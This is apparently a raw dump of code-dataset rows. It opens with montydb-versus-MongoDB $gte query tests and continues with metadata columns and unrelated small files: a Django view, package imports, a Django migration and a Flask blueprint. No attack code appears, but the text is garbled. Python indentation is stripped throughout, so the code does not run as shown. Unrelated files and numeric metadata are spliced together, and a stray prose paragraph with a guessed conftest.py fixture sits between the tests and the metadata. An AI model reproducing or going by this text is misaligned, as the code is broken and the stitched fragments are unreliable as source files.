mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_27(monty_find, mongo_find):
code_1as = Code("1", {"a": 5})
code_1bs = Code("1", {"b": 5})
code_1cs = Code("1", {"c": 5})
docs = [
{"a": code_1as},
{"a": code_1bs},
{"a": code_1cs}
]
spec = {"a": {"$gte": code_1bs}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_28(monty_find, mongo_find):
regex_0 = Regex("^0")
regex_a = Regex("^a")
docs = [
{"a": regex_a},
]
spec = {"a": {"$gte": regex_0}}
monty_c = monty_find(docs, spec)
# Can't have RegEx as arg to predicate
with pytest.raises(OperationFailure):
next(monty_c)
def test_qop_gte_29(monty_find, mongo_find):
docs = [
{"a": Decimal128("1.1")},
{"a": Decimal128("NaN")},
{"a": Decimal128("-NaN")},
{"a": Decimal128("sNaN")},
{"a": Decimal128("-sNaN")},
{"a": Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gte": Decimal128("NaN")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 4
assert monty_c.count() == mongo_c.count()
for i in range(4):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_30(monty_find, mongo_find):
docs = [
{"a": Decimal128("1.1")},
{"a": Decimal128("NaN")},
{"a": Decimal128("-NaN")},
{"a": Decimal128("sNaN")},
{"a": Decimal128("-sNaN")},
{"a": Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gte": Decimal128("-NaN")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 4
assert monty_c.count() == mongo_c.count()
for i in range(4):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_31(monty_find, mongo_find):
docs = [
{"a": Decimal128("1.1")},
{"a": Decimal128("NaN")},
{"a": Decimal128("-NaN")},
{"a": Decimal128("sNaN")},
{"a": Decimal128("-sNaN")},
{"a": Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gte": Decimal128("Infinity")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_32(monty_find, mongo_find):
docs = [
{"a": Decimal128("1.1")},
{"a": Decimal128("NaN")},
{"a": Decimal128("-NaN")},
{"a": Decimal128("sNaN")},
{"a": Decimal128("-sNaN")},
{"a": Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gte": 0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 4
assert monty_c.count() == mongo_c.count()
for i in range(4):
assert next(mongo_c) == next(monty_c)
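Every case above depends on the monty_find and mongo_find fixtures defined elsewhere in the suite. A plausible conftest.py sketch (fixture names and the monty_database dependency are assumptions; the real file presumably also manages storage setup and teardown):

import pytest

@pytest.fixture
def monty_find(monty_database):
    # Hypothetical: insert the docs into a fresh collection, then query it.
    def find(docs, spec):
        col = monty_database["test_col"]
        col.drop()
        col.insert_many(docs)
        return col.find(spec)
    return find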
| 23.627946
| 50
| 0.547203
| 2,079
| 14,035
| 3.440596
| 0.054834
| 0.103173
| 0.10569
| 0.058157
| 0.851531
| 0.838389
| 0.819097
| 0.793653
| 0.786943
| 0.752412
| 0
| 0.046184
| 0.27182
| 14,035
| 593
| 51
| 23.667791
| 0.653718
| 0.002565
| 0
| 0.67462
| 0
| 0
| 0.035081
| 0
| 0
| 0
| 0
| 0
| 0.199566
| 1
| 0.069414
| false
| 0
| 0.0282
| 0
| 0.097614
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a5f860217469d4fc9104734c6e9895f9869a0ddc
| 115
|
py
|
Python
|
credo_classification/views.py
|
credo-science/credo-classify
|
1cc5e00a4df36c4069c0d0fbc19f579780b79ca5
|
[
"MIT"
] | null | null | null |
credo_classification/views.py
|
credo-science/credo-classify
|
1cc5e00a4df36c4069c0d0fbc19f579780b79ca5
|
[
"MIT"
] | 8
|
2021-03-30T12:52:01.000Z
|
2022-03-12T00:19:45.000Z
|
credo_classification/views.py
|
credo-science/credo-classify
|
1cc5e00a4df36c4069c0d0fbc19f579780b79ca5
|
[
"MIT"
] | 1
|
2020-06-12T13:29:34.000Z
|
2020-06-12T13:29:34.000Z
|
from django.shortcuts import render
def home(request, *args, **kwargs):
return render(request, 'index.html')
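A hypothetical URLconf entry wiring the view above; the project's real urls.py may differ:

from django.urls import path
from credo_classification.views import home

urlpatterns = [
    path('', home, name='home'),
]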
| 19.166667
| 40
| 0.721739
| 15
| 115
| 5.533333
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147826
| 115
| 5
| 41
| 23
| 0.846939
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
57099777f9106dd4c9a8e471c3cb19baa9d33dad
| 88
|
py
|
Python
|
routes/__init__.py
|
LeeLin2602/backend
|
c3968cf2c09f20823152daa271bf4d8baa58b408
|
[
"BSD-3-Clause"
] | 1
|
2022-02-16T09:11:26.000Z
|
2022-02-16T09:11:26.000Z
|
routes/__init__.py
|
LeeLin2602/backend
|
c3968cf2c09f20823152daa271bf4d8baa58b408
|
[
"BSD-3-Clause"
] | null | null | null |
routes/__init__.py
|
LeeLin2602/backend
|
c3968cf2c09f20823152daa271bf4d8baa58b408
|
[
"BSD-3-Clause"
] | null | null | null |
#-*- encoding: UTF-8 -*-
from .auth import *
from .domains import *
from .ddns import *
| 17.6
| 24
| 0.647727
| 12
| 88
| 4.75
| 0.666667
| 0.350877
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013889
| 0.181818
| 88
| 5
| 25
| 17.6
| 0.777778
| 0.261364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
57157fcb1e08596a39412ccec3714abb699f92cc
| 205
|
py
|
Python
|
tests/test_pysparkexplore.py
|
oarodriguez/pyspark-explore
|
7556e3b3f16a6c688d8caba33c284167c3796075
|
[
"Apache-2.0"
] | null | null | null |
tests/test_pysparkexplore.py
|
oarodriguez/pyspark-explore
|
7556e3b3f16a6c688d8caba33c284167c3796075
|
[
"Apache-2.0"
] | null | null | null |
tests/test_pysparkexplore.py
|
oarodriguez/pyspark-explore
|
7556e3b3f16a6c688d8caba33c284167c3796075
|
[
"Apache-2.0"
] | null | null | null |
"""Verify the library top-level functionality."""
import pysparkexplore
def test_version():
"""Verify we have updated the package version."""
assert pysparkexplore.__version__ == "2022.2.0.dev0"
| 25.625
| 56
| 0.726829
| 25
| 205
| 5.76
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04
| 0.146341
| 205
| 7
| 57
| 29.285714
| 0.782857
| 0.42439
| 0
| 0
| 0
| 0
| 0.121495
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
572eec43be1de4d0329666704982e8733374930d
| 28
|
py
|
Python
|
pyreactors/oscillations/__init__.py
|
michelemontuschi/pyreactors
|
1b1f7edccb2ca7f9b1281385dbc9017d3791510d
|
[
"MIT"
] | null | null | null |
pyreactors/oscillations/__init__.py
|
michelemontuschi/pyreactors
|
1b1f7edccb2ca7f9b1281385dbc9017d3791510d
|
[
"MIT"
] | null | null | null |
pyreactors/oscillations/__init__.py
|
michelemontuschi/pyreactors
|
1b1f7edccb2ca7f9b1281385dbc9017d3791510d
|
[
"MIT"
] | null | null | null |
from .oscillations import *
| 14
| 27
| 0.785714
| 3
| 28
| 7.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
93bdaf8746307f429fe7f45fdc899e3f90a17145
| 28
|
py
|
Python
|
sendotp/__init__.py
|
saadmk11/sendotp-python
|
b0cd5c3da969d00a753d9614c5bea0e2978859c9
|
[
"MIT"
] | 5
|
2017-05-15T07:21:29.000Z
|
2022-03-02T01:01:47.000Z
|
sendotp/__init__.py
|
saadmk11/sendotp-python
|
b0cd5c3da969d00a753d9614c5bea0e2978859c9
|
[
"MIT"
] | 2
|
2017-05-15T07:57:36.000Z
|
2021-09-23T06:22:34.000Z
|
sendotp/__init__.py
|
saadmk11/sendotp-python
|
b0cd5c3da969d00a753d9614c5bea0e2978859c9
|
[
"MIT"
] | 10
|
2017-05-29T06:53:42.000Z
|
2020-05-22T10:29:00.000Z
|
from sendotp import sendotp
| 14
| 27
| 0.857143
| 4
| 28
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f519e020c408205c7e2e13f516f3f7b826e882ab
| 214
|
py
|
Python
|
server/security.py
|
s-bauer/yang-explorer
|
df2c946b66c3a303aa92435c286053a97b72176b
|
[
"Apache-2.0"
] | 437
|
2015-10-01T22:16:33.000Z
|
2022-03-29T08:21:28.000Z
|
server/security.py
|
s-bauer/yang-explorer
|
df2c946b66c3a303aa92435c286053a97b72176b
|
[
"Apache-2.0"
] | 114
|
2015-10-01T20:24:44.000Z
|
2022-03-19T10:21:49.000Z
|
server/security.py
|
s-bauer/yang-explorer
|
df2c946b66c3a303aa92435c286053a97b72176b
|
[
"Apache-2.0"
] | 196
|
2015-10-05T13:39:22.000Z
|
2022-03-18T02:50:24.000Z
|
import logging
from django.shortcuts import render_to_response
from django.template import RequestContext
def policy_handler(request):
return render_to_response('crossdomain.xml', {}, RequestContext(request))
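The handler serves a Flash cross-domain policy file, so it is presumably mapped to requests for crossdomain.xml. A hypothetical URLconf entry in the old url() style matching this codebase's Django era:

from django.conf.urls import url
from server.security import policy_handler

urlpatterns = [
    url(r'^crossdomain.xml$', policy_handler),
]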
| 30.571429
| 77
| 0.827103
| 26
| 214
| 6.615385
| 0.653846
| 0.116279
| 0.186047
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098131
| 214
| 6
| 78
| 35.666667
| 0.891192
| 0
| 0
| 0
| 0
| 0
| 0.070093
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.6
| 0.2
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
f54fbf148912f0c67520605e01d693eaf7e3e554
| 10,403
|
py
|
Python
|
cpovc_forms/migrations/0022_auto_20190712_1904.py
|
yashpatel12/CPIMS-api-newtest
|
d5129eb3aa034f70414a2471a72c0a74ad95f6ca
|
[
"Apache-2.0"
] | 3
|
2022-02-18T13:25:29.000Z
|
2022-02-25T11:49:11.000Z
|
cpovc_forms/migrations/0022_auto_20190712_1904.py
|
yashpatel12/CPIMS-api-newtest
|
d5129eb3aa034f70414a2471a72c0a74ad95f6ca
|
[
"Apache-2.0"
] | null | null | null |
cpovc_forms/migrations/0022_auto_20190712_1904.py
|
yashpatel12/CPIMS-api-newtest
|
d5129eb3aa034f70414a2471a72c0a74ad95f6ca
|
[
"Apache-2.0"
] | 22
|
2022-02-05T13:43:53.000Z
|
2022-02-26T14:29:06.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import datetime
class Migration(migrations.Migration):
dependencies = [
('cpovc_forms', '0021_auto_20190712_1506'),
]
operations = [
migrations.RenameField(
model_name='ovchivmanagement',
old_name='Adherence',
new_name='adherence',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='Peer_Educator_Name',
new_name='baseline_hei',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='FirstLine_Start_Date',
new_name='firstline_start_date',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='Hiv_Confirmed_Date',
new_name='hiv_confirmed_date',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='NHIF_Enrollment',
new_name='nhif_enrollment',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='NHIF_Status',
new_name='switch_secondline_arv',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='Support_group_Status',
new_name='switch_thirdline_arv',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='Substitution_FirstLine_Date',
new_name='treatment_initiated_date',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='Switch_SecondLine_Date',
new_name='viral_load_date',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='Switch_ThirdLine_Date',
new_name='visit_date',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Adherence_Drugs_Duration',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Adherence_counselling',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='BMI',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Detectable_ViralLoad_Interventions',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Disclosure',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Duration_ART',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Height',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='MUAC',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='MUAC_Score',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='NextAppointment_Date',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Nutritional_Support',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Peer_Educator_Contact',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Referral_Services',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Switch_SecondLine_ARV',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Switch_ThirdLine_ARV',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Treament_Supporter_HIV',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Treatment_Supporter_Age',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Treatment_Supporter_Gender',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Treatment_Supporter_Relationship',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Treatment_initiated_Date',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Viral_Load_Date',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Viral_Load_Results',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Visit_Date',
),
migrations.AddField(
model_name='ovchivmanagement',
name='adherence_counselling',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='adherence_drugs_duration',
field=models.CharField(max_length=3, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='bmi',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='detectable_viralload_interventions',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='disclosure',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='duration_art',
field=models.CharField(max_length=3, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='height',
field=models.CharField(max_length=3, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='muac',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='muac_score',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='nextappointment_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='nhif_status',
field=models.CharField(max_length=11, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='nutritional_support',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='peer_educator_contact',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='peer_educator_name',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='referral_services',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='substitution_firstline_date',
field=models.DateTimeField(default=datetime.datetime(2019, 7, 12, 19, 4, 23, 561430)),
),
migrations.AddField(
model_name='ovchivmanagement',
name='support_group_status',
field=models.CharField(max_length=11, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='switch_secondline_date',
field=models.DateTimeField(null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='switch_thirdline_date',
field=models.DateTimeField(null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='treament_supporter_hiv',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='treatment_supporter_age',
field=models.CharField(max_length=11, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='treatment_supporter_gender',
field=models.CharField(max_length=11, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='treatment_supporter_relationship',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='treatment_suppoter',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='viral_load_results',
field=models.CharField(max_length=7, null=True),
),
migrations.AlterField(
model_name='ovchivriskscreening',
name='art_referral_completed_date',
field=models.DateTimeField(default=datetime.datetime(2019, 7, 12, 19, 4, 23, 557898), null=True),
),
migrations.AlterField(
model_name='ovchivriskscreening',
name='art_referral_date',
field=models.DateTimeField(default=datetime.datetime(2019, 7, 12, 19, 4, 23, 557833), null=True),
),
migrations.AlterField(
model_name='ovchivriskscreening',
name='date_of_event',
field=models.DateField(default=datetime.datetime(2019, 7, 12, 19, 4, 23, 558119), null=True),
),
migrations.AlterField(
model_name='ovchivriskscreening',
name='referral_made_date',
field=models.DateTimeField(default=datetime.datetime(2019, 7, 12, 19, 4, 23, 557588), null=True),
),
]
| 34.333333
| 109
| 0.574257
| 863
| 10,403
| 6.670915
| 0.128621
| 0.096925
| 0.251867
| 0.241793
| 0.894563
| 0.868508
| 0.758555
| 0.582421
| 0.466736
| 0.411846
| 0
| 0.021117
| 0.321734
| 10,403
| 302
| 110
| 34.44702
| 0.794785
| 0.002019
| 0
| 0.702703
| 0
| 0
| 0.224374
| 0.066089
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010135
| 0
| 0.02027
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
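The 0022_auto_20190712_1904.py row above is an auto-generated Django migration built from three operation types: RenameField, RemoveField, and AddField. The hard-coded datetime.datetime(2019, 7, 12, ...) defaults are the classic artifact of accepting a one-off default at makemigrations time. A minimal sketch of the same three operation types; the 'myapp' and 'mymodel' names are placeholders, not from the row above:

# Hypothetical minimal migration using the same operation types as above.
from django.db import migrations, models

class Migration(migrations.Migration):
    dependencies = [('myapp', '0001_initial')]
    operations = [
        # rename a column in place (data is preserved)
        migrations.RenameField('mymodel', old_name='Old_Name', new_name='old_name'),
        # drop a column entirely
        migrations.RemoveField('mymodel', name='obsolete'),
        # add a new nullable column
        migrations.AddField('mymodel', name='added',
                            field=models.CharField(max_length=20, null=True)),
    ]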
f59118b39e19bb7f6d6c25addc5eeea94cd56be4
| 201
|
py
|
Python
|
dhtxmpp_componentd_watchdog/__main__.py
|
pendleto/dhtxmpp_component
|
f7b5f018b74d5d1bf34d175b6766677de9eaa987
|
[
"MIT"
] | 3
|
2018-10-24T07:07:44.000Z
|
2021-12-24T20:25:24.000Z
|
dhtxmpp_componentd_watchdog/__main__.py
|
pendleto/dhtxmpp_component
|
f7b5f018b74d5d1bf34d175b6766677de9eaa987
|
[
"MIT"
] | null | null | null |
dhtxmpp_componentd_watchdog/__main__.py
|
pendleto/dhtxmpp_component
|
f7b5f018b74d5d1bf34d175b6766677de9eaa987
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""dhtxmpp_componentd_watchdog.__main__: executed when dhtxmpp_componentd_watchdog directory is called as script."""
from .dhtxmpp_componentd_watchdog import main
main()
| 25.125
| 116
| 0.766169
| 24
| 201
| 6
| 0.666667
| 0.354167
| 0.520833
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005714
| 0.129353
| 201
| 8
| 117
| 25.125
| 0.817143
| 0.661692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
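The dhtxmpp_componentd_watchdog/__main__.py row above is the standard package entry-point idiom: a __main__.py module lets the package run via `python -m dhtxmpp_componentd_watchdog`. A generic sketch of the same idiom with a hypothetical package layout:

# Hypothetical package layout illustrating the entry-point idiom above:
#
#   mypackage/
#       __init__.py
#       core.py        # assumed to define main()
#       __main__.py    # this file
#
# Running `python -m mypackage` executes __main__.py, which simply
# imports and calls main().
from .core import main

main()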
1960b9ec9fef382b21fb8e1fd34659121ae0117c
| 28
|
py
|
Python
|
pyload/__init__.py
|
lrterry/py-load
|
c06ef979ee1761c5b9df642f5af5119da7ec09fe
|
[
"Apache-2.0"
] | null | null | null |
pyload/__init__.py
|
lrterry/py-load
|
c06ef979ee1761c5b9df642f5af5119da7ec09fe
|
[
"Apache-2.0"
] | null | null | null |
pyload/__init__.py
|
lrterry/py-load
|
c06ef979ee1761c5b9df642f5af5119da7ec09fe
|
[
"Apache-2.0"
] | null | null | null |
from pyload import __main__
| 14
| 27
| 0.857143
| 4
| 28
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
19912cff4c21129048112ac8354b6f08c99c1646
| 119
|
py
|
Python
|
app/schemas/__init__.py
|
widal001/flask-api-template
|
cbda9c6a00fdc355b235d869d65db77257595107
|
[
"MIT"
] | null | null | null |
app/schemas/__init__.py
|
widal001/flask-api-template
|
cbda9c6a00fdc355b235d869d65db77257595107
|
[
"MIT"
] | 5
|
2021-05-05T21:05:46.000Z
|
2021-05-12T19:19:34.000Z
|
app/schemas/__init__.py
|
widal001/flask-api-template
|
cbda9c6a00fdc355b235d869d65db77257595107
|
[
"MIT"
] | 1
|
2021-05-07T12:54:19.000Z
|
2021-05-07T12:54:19.000Z
|
from app.schemas.book_schema import BookSchema
from app.schemas.library_schema import LibrarySchema, LibraryBookSchema
| 39.666667
| 71
| 0.882353
| 15
| 119
| 6.866667
| 0.666667
| 0.135922
| 0.271845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07563
| 119
| 2
| 72
| 59.5
| 0.936364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
199d0a061df1f0260f95cafc2953d576ac4e5841
| 117
|
py
|
Python
|
app/settings/__init__.py
|
ace-ecosystem/ACE
|
d17b5ef4bccf923ec6be5115fabe40f0627dab2d
|
[
"Apache-2.0"
] | 24
|
2019-09-21T21:09:45.000Z
|
2022-03-15T19:48:13.000Z
|
app/settings/__init__.py
|
ace-ecosystem/ACE
|
d17b5ef4bccf923ec6be5115fabe40f0627dab2d
|
[
"Apache-2.0"
] | 54
|
2019-09-16T20:06:30.000Z
|
2021-08-18T22:22:08.000Z
|
app/settings/__init__.py
|
ace-ecosystem/ACE
|
d17b5ef4bccf923ec6be5115fabe40f0627dab2d
|
[
"Apache-2.0"
] | 9
|
2019-09-08T13:35:55.000Z
|
2021-01-03T15:23:37.000Z
|
from flask import Blueprint
settings = Blueprint('settings', __name__, url_prefix='/settings')
from . import views
| 19.5
| 66
| 0.769231
| 14
| 117
| 6.071429
| 0.642857
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128205
| 117
| 5
| 67
| 23.4
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.145299
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
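The app/settings/__init__.py row above shows the Flask Blueprint idiom, including the trailing `from . import views`: that import must come after the Blueprint object exists, so views.py can import the blueprint back without a circular-import error. A self-contained sketch of the same pattern as a hypothetical single-file app:

# Hypothetical single-file version of the Blueprint pattern shown above.
from flask import Flask, Blueprint

settings = Blueprint('settings', __name__, url_prefix='/settings')

@settings.route('/')
def index():
    # served at /settings/ once the blueprint is registered
    return 'settings home'

app = Flask(__name__)
app.register_blueprint(settings)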
5fdf09493492526f26506ac5d58d63878018df83
| 29
|
py
|
Python
|
onigiri/database/models/__init__.py
|
onigiri-team/core
|
27754e0379203e770dd6c9b998971c049b87608f
|
[
"Apache-2.0"
] | 9
|
2021-12-20T00:06:37.000Z
|
2021-12-26T21:52:34.000Z
|
onigiri/database/models/__init__.py
|
onigiri-team/core
|
27754e0379203e770dd6c9b998971c049b87608f
|
[
"Apache-2.0"
] | 1
|
2021-12-26T13:24:08.000Z
|
2021-12-27T12:23:25.000Z
|
